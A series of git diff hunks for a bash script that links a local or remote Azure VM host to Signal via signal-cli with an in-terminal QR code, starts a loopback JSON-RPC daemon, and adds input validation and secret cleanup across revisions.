+    *DAEMON_DOWN*) warn "  Remote daemon did not come up on $DAEMON_TCP; skipping post-test." ;;
+    *NC_MISSING*) warn "  Remote 'nc' not available; skipping JSON-RPC self-group post-test." ;;
+    *GROUP_ID_MISSING*) warn "  Remote updateGroup did not return groupId: $out" ;;
+    *) warn "  Remote post-test response (verify manually): $out" ;;
+  esac
+}
 
+local_daemon_group_posttest() {
+  local sigcli="$1"
   if ! daemon_up; then
     "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >"$DAEMON_LOG" 2>&1 &
     local _i
@@ -441,6 +423,16 @@ REMOTE
   fi
 }
 
+daemon_group_posttest() {
+  [ -n "$PHONE" ] || { warn "  --phone not set; skipping daemon/group/post-test."; return 0; }
+  info "[5/6] Ensuring JSON-RPC daemon on $DAEMON_TCP ..."
+  if [ "$MODE" = "remote" ]; then
+    remote_daemon_group_posttest "$SIGNAL_CLI_REMOTE"
+  else
+    local_daemon_group_posttest "$SIGNAL_CLI"
+  fi
+}
+
 # --------------------------------------------------------------------------- #
 # Main
 # --------------------------------------------------------------------------- #
@@ -449,7 +441,8 @@ main() {
 
   # Idempotency: if already linked, do not re-mint.
   local existing
-  existing="$(already_linked)"
+  existing="$(already_linked)" \
+    || die "Could not inspect existing Signal accounts on $HOST; refusing to mint a fresh link until the account probe succeeds."
   if [ -n "$existing" ]; then
     ok "[2/6] Host already linked as $existing — nothing to do (idempotent)."
     [ -z "$PHONE" ] && PHONE="$existing"

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -1,0 +1,370 @@
+#!/usr/bin/env bash
+#
+# signal-setup.sh — end-to-end Signal device-linking for amplihack.
+#
+# Generalizes the proven zero-latency in-terminal QR linking loop into a single
+# idempotent, reusable command for LOCAL and REMOTE (azlin VM) hosts.
+#
+# THE HARD-WON FACTS (see SKILL.md for the full write-up):
+#
+#   * 60-SECOND WINDOW — Signal's device-link provisioning websocket to
+#     chat.signal.org closes with server code 1001 EXACTLY ~60s after it opens.
+#     A minted link QR is therefore valid for only ~60s. Any delivery path
+#     slower than a few seconds expires it ("invalid response from server").
+#     => We mint and render the QR in-terminal with ZERO delivery latency.
+#
+#   * ANSIUTF8i — render with `qrencode -t ANSIUTF8i` (trailing "i" = inverted).
+#     Plain ANSIUTF8 is dark-on-dark and INVISIBLE / unscannable on dark
+#     terminal backgrounds. The inverted variant is required.
+#
+#   * NEVER route the QR through a Signal message/attachment during linking.
+#     That is the DEPRECATED slow path (relay/daemon delivery = 40-60s) which
+#     reliably blew the 60s window. QR goes to the TERMINAL, nowhere else.
+#
+#   * systemd-run persistence — the `signal-cli link` process runs under a
+#     transient systemd unit (sig-link-<host>) so it survives the launching
+#     shell and stays connected for the full window; it exits on a successful
+#     scan. Remote hosts launch the same unit via `az vm run-command`.
+#
+# OPERATIONAL GOTCHAS (remote hosts):
+#   (a) azlin is a Rust binary that ABORTS (SIGABRT/core-dump) on SIGPIPE.
+#       NEVER pipe azlin into `grep -q` or any early-closing consumer.
+#       Capture full output first, then filter.
+#   (b) Only ONE bastion session to a given host at a time. Concurrent
+#       azlin/az sessions to the same VM core-dump.
+#   (c) azlin invocation form:
+#         azlin connect <host> --resource-group rysweet-linux-vm-pool \
+#           --no-tmux -y -- "<cmd>"
+#
+set -uo pipefail
+
+# --------------------------------------------------------------------------- #
+# Defaults / configuration
+# --------------------------------------------------------------------------- #
+SIGNAL_CLI="${SIGNAL_CLI:-$HOME/.local/bin/signal-cli}"
+SIGNAL_CLI_REMOTE="/home/azureuser/.local/bin/signal-cli"
+RESOURCE_GROUP="${SIGNAL_SETUP_RG:-rysweet-linux-vm-pool}"
+DAEMON_TCP="127.0.0.1:7583"
+QR_MARGIN=2
+WINDOW_SECONDS=55   # advertise a hair under 60 so the user is never late
+
+HOST=""
+PHONE="${SIGNAL_PHONE:-}"
+GROUP_NAME="amplihack"
+MODE=""             # local | remote (auto-detected if empty)
+DO_DAEMON=1
+ASSUME_YES=0
+
+export PATH="$HOME/.local/bin:$PATH"
+
+# --------------------------------------------------------------------------- #
+# Helpers
+# --------------------------------------------------------------------------- #
+log()  { printf '%s\n' "$*" >&2; }
+info() { printf '\033[0;36m%s\033[0m\n' "$*" >&2; }
+ok()   { printf '\033[0;32m%s\033[0m\n' "$*" >&2; }
+warn() { printf '\033[0;33m%s\033[0m\n' "$*" >&2; }
+err()  { printf '\033[0;31m%s\033[0m\n' "$*" >&2; }
+die()  { err "!! $*"; exit 1; }
+
+usage() {
+  cat >&2 <<'USAGE'
+signal-setup.sh — link a host to Signal for amplihack (end-to-end, idempotent).
+
+USAGE:
+  signal-setup.sh --host <name> [options]
+
+OPTIONS:
+  --host <name>        Target host. "local"/current hostname => mint locally.
+                       Any other name => remote azlin VM (via az run-command).
+  --phone <+E164>      Signal phone number for verify/daemon/group steps.
+                       Falls back to $SIGNAL_PHONE. Required for daemon/group.
+  --group <name>       Self-group name for the post-test (default: amplihack).
+  --resource-group <rg>  Azure RG for remote hosts (default: rysweet-linux-vm-pool).
+  --local              Force local mint.
+  --remote             Force remote mint.
+  --no-daemon          Skip the daemon + self-group + post-test step.
+  --daemon             Force the daemon + self-group + post-test step (default).
+  -y, --yes            Non-interactive: assume the phone scan screen is ready.
+  -h, --help           Show this help.
+
+FLOW:
+  prereq check -> confirm scan screen open -> mint under systemd-run
+  -> print ANSIUTF8i QR in-terminal (~60s window) -> verify linkage
+  -> (optional) start daemon + ensure self-group + post-test.
+USAGE
+}
+
+# Run a command ON the target host (local => direct, remote => az run-command).
+# Captures FULL output first (never pipes az/azlin into early-closing readers).
+# Build a JSON-RPC request line for the signal-cli TCP daemon.
+rpc() { # rpc <method> <params-json>
+  printf '{"jsonrpc":"2.0","method":"%s","params":%s,"id":1}\n' "$1" "$2"
+}
+
+remote_run() {
+  local script="$1" out
+  out="$(az vm run-command invoke -g "$RESOURCE_GROUP" -n "$HOST" \
+    --command-id RunShellScript --scripts "$script" \
+    --query 'value[0].message' -o tsv 2>/dev/null)" || return 1
+  printf '%s' "$out"
+}
+
+# --------------------------------------------------------------------------- #
+# Argument parsing
+# --------------------------------------------------------------------------- #
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --host)           HOST="${2:-}"; shift 2 ;;
+    --phone)          PHONE="${2:-}"; shift 2 ;;
+    --group)          GROUP_NAME="${2:-}"; shift 2 ;;
+    --resource-group) RESOURCE_GROUP="${2:-}"; shift 2 ;;
+    --local)          MODE="local"; shift ;;
+    --remote)         MODE="remote"; shift ;;
+    --no-daemon)      DO_DAEMON=0; shift ;;
+    --daemon)         DO_DAEMON=1; shift ;;
+    -y|--yes)         ASSUME_YES=1; shift ;;
+    -h|--help)        usage; exit 0 ;;
+    *) die "unknown argument: $1 (use --help)" ;;
+  esac
+done
+
+[ -n "$HOST" ] || { usage; die "--host is required"; }
+
+# Auto-detect mode if not forced.
+if [ -z "$MODE" ]; then
+  if [ "$HOST" = "local" ] || [ "$HOST" = "localhost" ] || [ "$HOST" = "$(hostname)" ]; then
+    MODE="local"
+  else
+    MODE="remote"
+  fi
+fi
+
+NAME="amplihack-$HOST"
+UNIT="sig-link-$HOST"
+URI_FILE="/tmp/slink-$HOST.out"
+LOG_FILE="/tmp/scli-$HOST.log"
+
+info "=== signal-setup: host=$HOST mode=$MODE unit=$UNIT ==="
+
+# --------------------------------------------------------------------------- #
+# Step 1: Prerequisites
+# --------------------------------------------------------------------------- #
+check_prereqs_local() {
+  info "[1/6] Checking prerequisites (local)..."
+  [ -x "$SIGNAL_CLI" ] || die "signal-cli not found/executable at $SIGNAL_CLI (known-good: 0.14.5 at ~/.local/opt/signal-cli-0.14.5/bin/signal-cli symlinked to ~/.local/bin/signal-cli)"
+  command -v qrencode >/dev/null 2>&1 || die "qrencode not installed (apt-get install -y qrencode)"
+  command -v systemd-run >/dev/null 2>&1 || die "systemd-run not available on this host"
+  ok "  signal-cli: $("$SIGNAL_CLI" --version 2>/dev/null || echo present)"
+  ok "  qrencode + systemd-run present"
+}
+
+check_prereqs_remote() {
+  info "[1/6] Checking prerequisites (remote: $HOST)..."
+  command -v az >/dev/null 2>&1 || die "az CLI not installed (required for remote hosts)"
+  # We render the QR LOCALLY, so qrencode must also exist locally.
+  command -v qrencode >/dev/null 2>&1 || die "qrencode not installed locally (needed to render the remote QR)"
+  local out
+  out="$(remote_run "test -x $SIGNAL_CLI_REMOTE && echo SIGCLI_OK; command -v systemd-run >/dev/null 2>&1 && echo SYSTEMD_OK")" \
+    || die "az vm run-command failed for $HOST in $RESOURCE_GROUP"
+  case "$out" in
+    *SIGCLI_OK*) : ;;
+    *) die "signal-cli missing on $HOST at $SIGNAL_CLI_REMOTE" ;;
+  esac
+  case "$out" in
+    *SYSTEMD_OK*) : ;;
+    *) die "systemd-run missing on $HOST" ;;
+  esac
+  ok "  remote signal-cli + systemd-run present; local qrencode present"
+}
+
+# --------------------------------------------------------------------------- #
+# Step 2: Idempotency — already linked?
+# --------------------------------------------------------------------------- #
+already_linked() {
+  # Prints the linked number if the host already has an account, else nothing.
+  local accounts
+  if [ "$MODE" = "local" ]; then
+    accounts="$("$SIGNAL_CLI" listAccounts 2>/dev/null)"
+  else
+    accounts="$(remote_run "$SIGNAL_CLI_REMOTE listAccounts 2>/dev/null")"
+  fi
+  # Prefer an explicit phone match when --phone given; otherwise any Number line.
+  if [ -n "$PHONE" ]; then
+    printf '%s\n' "$accounts" | grep -F "Number: $PHONE" >/dev/null 2>&1 && printf '%s' "$PHONE"
+  else
+    printf '%s\n' "$accounts" | sed -n 's/.*Number: \(+[0-9][0-9]*\).*/\1/p' | head -n1
+  fi
+}
+
+# --------------------------------------------------------------------------- #
+# Step 3: Mint the link URI under a transient systemd unit
+# --------------------------------------------------------------------------- #
+mint_local() {
+  systemctl --user reset-failed "$UNIT" 2>/dev/null
+  sudo systemctl reset-failed "$UNIT" 2>/dev/null
+  sudo systemctl stop "$UNIT" 2>/dev/null
+  sudo rm -f "$URI_FILE" "$LOG_FILE"
+  sudo systemd-run --unit="$UNIT" --uid=azureuser --gid=azureuser \
+    --setenv=HOME=/home/azureuser \
+    --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
+    /bin/bash -c "$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1" \
+    >/dev/null 2>&1
+  local _i
+  for _i in $(seq 1 20); do
+    grep -q '^sgnl://' "$URI_FILE" 2>/dev/null && break
+    sleep 0.5
+  done
+  grep -m1 '^sgnl://' "$URI_FILE" 2>/dev/null
+}
+
+mint_remote() {
+  # run-command runs as ROOT, so --uid/--gid=azureuser is REQUIRED so the
+  # linked account lands under the azureuser home, not root's.
+  local script out
+  script="$(cat <<REMOTE
+systemctl reset-failed $UNIT 2>/dev/null
+systemctl stop $UNIT 2>/dev/null
+rm -f $URI_FILE $LOG_FILE
+systemd-run --unit=$UNIT --uid=azureuser --gid=azureuser \
+  --setenv=HOME=/home/azureuser \
+  --setenv=PATH=/home/azureuser/.local/bin:/usr/bin:/bin \
+  /bin/bash -c '$SIGNAL_CLI_REMOTE -vv --log-file $LOG_FILE link -n $NAME > $URI_FILE 2>&1' >/dev/null 2>&1
+for i in \$(seq 1 20); do grep -q '^sgnl://' $URI_FILE 2>/dev/null && break; sleep 0.5; done
+echo URI_START; grep -m1 '^sgnl://' $URI_FILE 2>/dev/null; echo URI_END
+REMOTE
+)"
+  # Capture FULL output first (SIGPIPE gotcha), then extract.
+  out="$(remote_run "$script")" || return 1
+  printf '%s\n' "$out" | sed -n 's/.*URI_START//p; /sgnl:\/\//p' | grep -m1 '^sgnl://'
+}
+
+# --------------------------------------------------------------------------- #
+# Step 4: Verify linkage
+# --------------------------------------------------------------------------- #
+verify_linkage() {
+  info "[4/6] Verifying linkage (up to ${WINDOW_SECONDS}s)..."
+  local _i num unit_state
+  for _i in $(seq 1 "$WINDOW_SECONDS"); do
+    num="$(already_linked)"
+    if [ -n "$num" ]; then
+      # The transient unit exits (inactive) on success.
+      if [ "$MODE" = "local" ]; then
+        unit_state="$(systemctl is-active "$UNIT" 2>/dev/null)"
+      else
+        unit_state="$(remote_run "systemctl is-active $UNIT 2>/dev/null")"
+      fi
+      ok "  Linked: $num  (unit $UNIT: ${unit_state:-inactive})"
+      [ -z "$PHONE" ] && PHONE="$num"
+      return 0
+    fi
+    sleep 1
+  done
+  err "  No linked account detected within the window."
+  err "  Trace log on host: $LOG_FILE"
+  err "  Look for: 'Associated with: +<phone>' then 'Finishing new device registration'."
+  return 1
+}
+
+# --------------------------------------------------------------------------- #
+# Step 5+6: Daemon + self-group + post-test (JSON-RPC on 127.0.0.1:7583)
+# --------------------------------------------------------------------------- #
+daemon_group_posttest() {
+  [ -n "$PHONE" ] || { warn "  --phone not set; skipping daemon/group/post-test."; return 0; }
+  info "[5/6] Ensuring JSON-RPC daemon on $DAEMON_TCP ..."
+
+  local sigcli
+  if [ "$MODE" = "local" ]; then sigcli="$SIGNAL_CLI"; else
+    warn "  Daemon/group/post-test target the LOCAL machine's daemon."
+    warn "  For a remote-linked host, run these steps on that host separately."
+    return 0
+  fi
+
+  if ! (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null; then
+    "$sigcli" -a "$PHONE" daemon --tcp "$DAEMON_TCP" >/tmp/signal-daemon-"$HOST".log 2>&1 &
+    local _i
+    for _i in $(seq 1 20); do
+      (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null && break
+      sleep 0.5
+    done
+  fi
+  (exec 3<>/dev/tcp/127.0.0.1/7583) 2>/dev/null \
+    || { warn "  Daemon did not come up on $DAEMON_TCP; skipping post-test."; return 0; }
+  ok "  Daemon reachable on $DAEMON_TCP"
+
+  command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; skipping JSON-RPC self-group post-test."; return 0; }
+
+  info "[6/6] Ensuring self-group '$GROUP_NAME' + post-test ..."
+  local resp group_id
+  resp="$(rpc updateGroup "{\"account\":\"$PHONE\",\"name\":\"$GROUP_NAME\"}" \
+    | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)"
+  group_id="$(printf '%s' "$resp" | sed -n 's/.*"groupId":"\([^"]*\)".*/\1/p')"
+  if [ -z "$group_id" ]; then
+    warn "  Could not obtain groupId from updateGroup response:"
+    warn "    $resp"
+    return 0
+  fi
+  ok "  self-group id: $group_id"
+
+  resp="$(rpc send "{\"account\":\"$PHONE\",\"groupId\":\"$group_id\",\"message\":\"amplihack signal-setup: link verified\"}" \
+    | timeout 15 nc 127.0.0.1 7583 2>/dev/null | head -n1)"
+  # Empty results array is NORMAL/success for a self-only group.
+  if printf '%s' "$resp" | grep -q '"results":\[\]'; then
+    ok "  Post-test OK: {\"results\":[],...} (empty results = success for self-group)"
+  else
+    warn "  Post-test response (verify manually): $resp"
+  fi
+}
+
+# --------------------------------------------------------------------------- #
+# Main
+# --------------------------------------------------------------------------- #
+main() {
+  if [ "$MODE" = "local" ]; then check_prereqs_local; else check_prereqs_remote; fi
+
+  # Idempotency: if already linked, do not re-mint.
+  local existing
+  existing="$(already_linked)"
+  if [ -n "$existing" ]; then
+    ok "[2/6] Host already linked as $existing — nothing to do (idempotent)."
+    [ -z "$PHONE" ] && PHONE="$existing"
+    [ "$DO_DAEMON" -eq 1 ] && daemon_group_posttest
+    ok "=== signal-setup complete (already linked) ==="
+    return 0
+  fi
+
+  # Prompt: the phone MUST be on the scan screen BEFORE we mint (60s window).
+  info "[3/6] Prepare your phone: Signal > Settings > Linked Devices > 'Link New Device'."
+  info "      Get to the CAMERA / scan screen NOW."
+  if [ "$ASSUME_YES" -ne 1 ]; then
+    printf '\033[0;36mAre you on the scan screen and ready? [y/N] \033[0m' >&2
+    local answer=""
+    read -r answer </dev/tty || answer=""
+    case "$answer" in
+      y|Y|yes|YES) : ;;
+      *) die "Aborted — re-run when you are on the scan screen." ;;
+    esac
+  fi
+
+  info "  Minting fresh link (unit $UNIT)..."
+  local uri
+  if [ "$MODE" = "local" ]; then uri="$(mint_local)"; else uri="$(mint_remote)"; fi
+  [ -n "${uri:-}" ] || die "Failed to obtain a link URI for $HOST. Check signal-cli/systemd-run on the host (trace: $LOG_FILE)."
+
+  # Zero-latency delivery: QR to the TERMINAL only, inverted for dark backgrounds.
+  printf '\n' >&2
+  printf '############################################################\n' >&2
+  printf '#  SCAN NOW — ~%ss until Signal closes the socket (1001)   #\n' "$WINDOW_SECONDS" >&2
+  printf '#  Signal > Linked Devices > Link New Device > scan below   #\n' >&2
+  printf '############################################################\n\n' >&2
+  qrencode -t ANSIUTF8i -m "$QR_MARGIN" "$uri"
+  printf '\n(host=%s unit=%s minted=%s)\n' "$HOST" "$UNIT" "$(date -u +%H:%M:%SZ)" >&2
+
+  verify_linkage || die "Linkage not verified. Re-run to mint a fresh QR (the old one has expired)."
+
+  [ "$DO_DAEMON" -eq 1 ] && daemon_group_posttest
+
+  ok "=== signal-setup complete for $HOST ==="
+}
+
+main

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -6,6 +6,12 @@ RESOURCE_GROUP="${SIGNAL_SETUP_RG:-rysweet-linux-vm-pool}"
 DAEMON_TCP="${SIGNAL_SETUP_DAEMON_TCP:-127.0.0.1:7583}"
 QR_MARGIN=2
 WINDOW_SECONDS=55   # advertise a hair under 60 so the user is never late
+# Linkage-verification budget. Decoupled from the QR window on purpose: a single
+# remote `az vm run-command` poll can itself take up to AZ_RUN_TIMEOUT_SECONDS
+# (~90s), so a 55s window yields only ~1 real remote attempt and can trip a
+# spurious "not verified" re-mint even though linking succeeded. Operators on
+# slow remote paths should raise SIGNAL_SETUP_VERIFY_TIMEOUT_SECONDS.
+VERIFY_TIMEOUT_SECONDS="${SIGNAL_SETUP_VERIFY_TIMEOUT_SECONDS:-$WINDOW_SECONDS}"
 AZ_RUN_TIMEOUT_SECONDS="${SIGNAL_SETUP_AZ_TIMEOUT_SECONDS:-90}"
 LOCAL_SIGNAL_TIMEOUT_SECONDS="${SIGNAL_SETUP_LOCAL_TIMEOUT_SECONDS:-10}"
 DAEMON_WAIT_ATTEMPTS="${SIGNAL_SETUP_DAEMON_WAIT_ATTEMPTS:-20}"
@@ -41,6 +47,10 @@ OPTIONS:
   --daemon             Force the daemon + self-group + post-test step (default).
   -y, --yes            Non-interactive: assume the phone scan screen is ready.
   -h, --help           Show this help.
+ENVIRONMENT:
+  SIGNAL_SETUP_VERIFY_TIMEOUT_SECONDS  Linkage-verify budget (default: 55).
+                       Raise on slow remote hosts where one az run-command poll
+                       can take ~90s, to avoid a spurious re-mint.
 USAGE
 }
 # JSON-escape a raw string for safe embedding inside a JSON string value.
@@ -161,12 +171,37 @@ RUN_TOKEN="${EPOCHSECONDS}-$$-${RANDOM}${RANDOM}"
 URI_FILE="/tmp/slink-${HOST}-${RUN_TOKEN}.out"
 LOG_FILE="/tmp/scli-${HOST}-${RUN_TOKEN}.log"
 DAEMON_LOG="/tmp/signal-daemon-${HOST}-${RUN_TOKEN}.log"
+# Flipped to 1 only on a fully successful run. Governs whether the trace/daemon
+# logs (which hold identity material but NOT the sgnl:// link secret) are purged
+# or retained-0600-for-debugging by cleanup_secrets. The link secret (URI_FILE)
+# is ALWAYS purged regardless of outcome.
+RUN_SUCCEEDED=0
 cleanup_secrets() {
+  # The sgnl:// provisioning secret (URI_FILE) is unconditionally purged — it is
+  # the crown jewel and must never survive the process.
+  # The -vv trace (LOG_FILE) and the local daemon log (DAEMON_LOG) contain no
+  # link secret; on FAILURE we retain them (already 0600) and print the path so
+  # a hard-to-reproduce, ~60s-window link failure stays debuggable. On success
+  # they are purged (SECURITY.md §7).
   if [ "$MODE" = "local" ]; then
-    rm -f "$URI_FILE" "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
-    sudo rm -f "$URI_FILE" "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
+    rm -f "$URI_FILE" 2>/dev/null
+    sudo rm -f "$URI_FILE" 2>/dev/null
+    if [ "$RUN_SUCCEEDED" -eq 1 ]; then
+      rm -f "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
+      sudo rm -f "$LOG_FILE" "$DAEMON_LOG" 2>/dev/null
+    else
+      local _f
+      for _f in "$LOG_FILE" "$DAEMON_LOG"; do
+        [ -s "$_f" ] && warn "  Retained on failure for debugging (0600): $_f"
+      done
+    fi
   else
-    remote_run "rm -f $URI_FILE $LOG_FILE" >/dev/null 2>&1
+    remote_run "rm -f $URI_FILE" >/dev/null 2>&1
+    if [ "$RUN_SUCCEEDED" -eq 1 ]; then
+      remote_run "rm -f $LOG_FILE" >/dev/null 2>&1
+    else
+      warn "  Retained remote trace for debugging (0600 on $HOST): $LOG_FILE"
+    fi
   fi
 }
 trap cleanup_secrets EXIT INT TERM
@@ -300,12 +335,12 @@ REMOTE
 # Step 4: Verify linkage
 # --------------------------------------------------------------------------- #
 verify_linkage() {
-  info "[4/6] Verifying linkage (up to ${WINDOW_SECONDS}s)..."
+  info "[4/6] Verifying linkage (up to ${VERIFY_TIMEOUT_SECONDS}s)..."
   # $EPOCHSECONDS is a fork-free bash builtin; using it instead of $(date +%s)
   # avoids ~2 subprocess forks per poll (~110 over the full window) in this hot
   # loop without changing behaviour.
   local num unit_state deadline
-  deadline=$(( EPOCHSECONDS + WINDOW_SECONDS ))
+  deadline=$(( EPOCHSECONDS + VERIFY_TIMEOUT_SECONDS ))
   while (( EPOCHSECONDS < deadline )); do
     num="$(already_linked)" || { warn "  Could not query linked accounts yet; retrying."; num=""; }
     if [ -n "$num" ]; then
@@ -383,7 +418,11 @@ local_daemon_group_posttest() {
     done
   fi
   daemon_up \
-    || { warn "  Daemon did not come up on $DAEMON_TCP."; return 1; }
+    || { warn "  Daemon did not come up on $DAEMON_TCP.";
+         if [ -s "$DAEMON_LOG" ]; then
+           warn "  Last daemon-log lines ($DAEMON_LOG):"; tail -n 20 "$DAEMON_LOG" >&2
+         fi
+         return 1; }
   ok "  Daemon reachable on $DAEMON_TCP"
   command -v nc >/dev/null 2>&1 || { warn "  'nc' not available; cannot run JSON-RPC self-group post-test."; return 1; }
   info "[6/6] Ensuring self-group '$GROUP_NAME' + post-test ..."
@@ -441,6 +480,7 @@ main() {
       daemon_group_posttest || die "Daemon/self-group/post-test failed."
     fi
     ok "=== signal-setup complete (already linked) ==="
+    RUN_SUCCEEDED=1
     return 0
   fi
 
@@ -492,6 +532,7 @@ main() {
   fi
 
   ok "=== signal-setup complete for $HOST ==="
+  RUN_SUCCEEDED=1
 }
 
 main

--- a/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+++ b/amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
@@ -1,28 +1,15 @@
 #!/usr/bin/env bash
-#
-# signal-setup.sh — end-to-end Signal device-linking for amplihack.
-#
-# Generalizes the proven zero-latency in-terminal QR linking loop into a single
-# idempotent, reusable command for LOCAL and REMOTE (azlin VM) hosts.
-#
-# See SKILL.md for the operational invariants: the ~60s Signal provisioning
-# window, ANSIUTF8i QR rendering, terminal-only QR delivery, systemd-run
-# persistence, and azlin/bastion gotchas.
-#
 set -uo pipefail
-
-# --------------------------------------------------------------------------- #
-# Defaults / configuration
-# --------------------------------------------------------------------------- #
 SIGNAL_CLI="${SIGNAL_CLI:-$HOME/.local/bin/signal-cli}"
 SIGNAL_CLI_REMOTE="/home/azureuser/.local/bin/signal-cli"
 RESOURCE_GROUP="${SIGNAL_SETUP_RG:-rysweet-linux-vm-pool}"
 DAEMON_TCP="${SIGNAL_SETUP_DAEMON_TCP:-127.0.0.1:7583}"
 QR_MARGIN=2
 WINDOW_SECONDS=55   # advertise a hair under 60 so the user is never late
-AZ_RUN_TIMEOUT_SECONDS="${SIGNAL_SETUP_AZ_TIMEOUT_SECONDS:-15}"
+AZ_RUN_TIMEOUT_SECONDS="${SIGNAL_SETUP_AZ_TIMEOUT_SECONDS:-90}"
 LOCAL_SIGNAL_TIMEOUT_SECONDS="${SIGNAL_SETUP_LOCAL_TIMEOUT_SECONDS:-10}"
-
+DAEMON_WAIT_ATTEMPTS="${SIGNAL_SETUP_DAEMON_WAIT_ATTEMPTS:-20}"
+RPC_TIMEOUT_SECONDS="${SIGNAL_SETUP_RPC_TIMEOUT_SECONDS:-15}"
 HOST=""
 PHONE="${SIGNAL_PHONE:-}"
 GROUP_NAME="amplihack"
@@ -30,26 +17,17 @@ MODE=""             # local | remote (auto-detected if empty)
 DO_DAEMON=1
 ASSUME_YES=0
 DAEMON_UNIT=""
-
 export PATH="$HOME/.local/bin:$PATH"
-
-# --------------------------------------------------------------------------- #
-# Helpers
-# --------------------------------------------------------------------------- #
-log()  { printf '%s\n' "$*" >&2; }
 info() { printf '\033[0;36m%s\033[0m\n' "$*" >&2; }
 ok()   { printf '\033[0;32m%s\033[0m\n' "$*" >&2; }
 warn() { printf '\033[0;33m%s\033[0m\n' "$*" >&2; }
 err()  { printf '\033[0;31m%s\033[0m\n' "$*" >&2; }
 die()  { err "!! $*"; exit 1; }
-
 usage() {
   cat >&2 <<'USAGE'
 signal-setup.sh — link a host to Signal for amplihack (end-to-end, idempotent).
-
 USAGE:
   signal-setup.sh --host <name> [options]
-
 OPTIONS:
   --host <name>        Target host. "local"/current hostname => mint locally.
                        Any other name => remote azlin VM (via az run-command).
@@ -63,14 +41,8 @@ OPTIONS:
   --daemon             Force the daemon + self-group + post-test step (default).
   -y, --yes            Non-interactive: assume the phone scan screen is ready.
   -h, --help           Show this help.
-
-FLOW:
-  prereq check -> confirm scan screen open -> mint under systemd-run
-  -> print ANSIUTF8i QR in-terminal (~60s window) -> verify linkage
-  -> (optional) start daemon + ensure self-group + post-test.
 USAGE
 }
-
 # JSON-escape a raw string for safe embedding inside a JSON string value.
 json_escape() { # json_escape <raw>
   local s="$1"
@@ -81,19 +53,16 @@ json_escape() { # json_escape <raw>
   s="${s//$'\t'/\\t}" # tab
   printf '%s' "$s"
 }
-
 # Build a JSON-RPC request line for the signal-cli TCP daemon.
 rpc() { # rpc <method> <params-json>
   printf '{"jsonrpc":"2.0","method":"%s","params":%s,"id":1}\n' "$1" "$2"
 }
-
 # True iff the signal-cli JSON-RPC daemon is accepting connections on DAEMON_TCP.
 # Derives the /dev/tcp path from DAEMON_TCP so the endpoint is defined once.
 daemon_up() {
   [ "${SIGNAL_SETUP_TEST_DAEMON_UP:-0}" = "1" ] && return 0
   (exec 3<>"/dev/tcp/${DAEMON_TCP/:/\/}") 2>/dev/null
 }
-
 # Run a command ON the remote target host via az run-command. Captures FULL
 # output first (never pipes az/azlin into an early-closing reader — SIGPIPE
 # core-dumps azlin), then returns it for the caller to filter.
@@ -109,7 +78,6 @@ remote_run() {
   fi
   printf '%s' "$out"
 }
-
 # --------------------------------------------------------------------------- #
 # Argument parsing
 # --------------------------------------------------------------------------- #
@@ -128,9 +96,7 @@ while [ $# -gt 0 ]; do
     *) die "unknown argument: $1 (use --help)" ;;
   esac
 done
-
 [ -n "$HOST" ] || { usage; die "--host is required"; }
-
 # --------------------------------------------------------------------------- #
 # Input validation — fail closed. These values flow into shell command lines,
 # az run-command payloads (executed as root remotely), and JSON-RPC strings,
@@ -145,7 +111,6 @@ validate() { # validate <label> <value> <regex>
   [[ "$2" =~ $3 ]] \
     || die "$1 contains invalid characters: '$2' (allowed: $3)"
 }
-
 # Hostnames / VM names: DNS-label + Azure resource charset.
 validate "--host" "$HOST" '^[A-Za-z0-9._-]+$'
 # Azure resource group naming charset.
@@ -156,7 +121,29 @@ validate "--group" "$GROUP_NAME" '^[A-Za-z0-9._ -]+$'
 if [ -n "$PHONE" ]; then
   validate "--phone" "$PHONE" '^\+[1-9][0-9]{7,14}$'
 fi
-
+# Daemon JSON-RPC endpoint: MUST stay loopback-only. The signal-cli JSON-RPC
+# daemon is UNAUTHENTICATED (SECURITY.md §6 / §10.4 / T5), so its ONLY security
+# boundary is the network binding. SIGNAL_SETUP_DAEMON_TCP flows verbatim into
+# `daemon --tcp`, /dev/tcp probes, and nc connections, so an operator setting a
+# routable host (e.g. 0.0.0.0:7583) would expose full send/receive control of
+# the linked account to the network — the exact threat SECURITY.md claims is
+# mitigated. Fail closed: loopback host + numeric port only. Reject IPv6 /
+# multi-colon forms, which would also break the host:port parsing that
+# daemon_up() and the nc invocations rely on (single-colon assumption).
+case "$DAEMON_TCP" in
+  *:*:*) die "SIGNAL_SETUP_DAEMON_TCP must be host:port (got '$DAEMON_TCP'); IPv6 is unsupported to preserve the loopback-only invariant (SECURITY.md §6)" ;;
+  *:*)   : ;;
+  *)     die "SIGNAL_SETUP_DAEMON_TCP must be host:port (got '$DAEMON_TCP')" ;;
+esac
+DAEMON_TCP_HOST="${DAEMON_TCP%:*}"
+DAEMON_TCP_PORT="${DAEMON_TCP##*:}"
+case "$DAEMON_TCP_HOST" in
+  127.0.0.1|localhost) : ;;
+  *) die "SIGNAL_SETUP_DAEMON_TCP host must be loopback (127.0.0.1 or localhost); refusing to bind the unauthenticated daemon to '$DAEMON_TCP_HOST' (SECURITY.md §6/§10.4, threat T5)" ;;
+esac
+validate "SIGNAL_SETUP_DAEMON_TCP port" "$DAEMON_TCP_PORT" '^[1-9][0-9]{0,4}$'
+[ "$DAEMON_TCP_PORT" -le 65535 ] \
+  || die "SIGNAL_SETUP_DAEMON_TCP port out of range (1-65535): $DAEMON_TCP_PORT"
 # Auto-detect mode if not forced.
 if [ -z "$MODE" ]; then
   if [ "$HOST" = "local" ] || [ "$HOST" = "localhost" ] || [ "$HOST" = "$(hostname)" ]; then
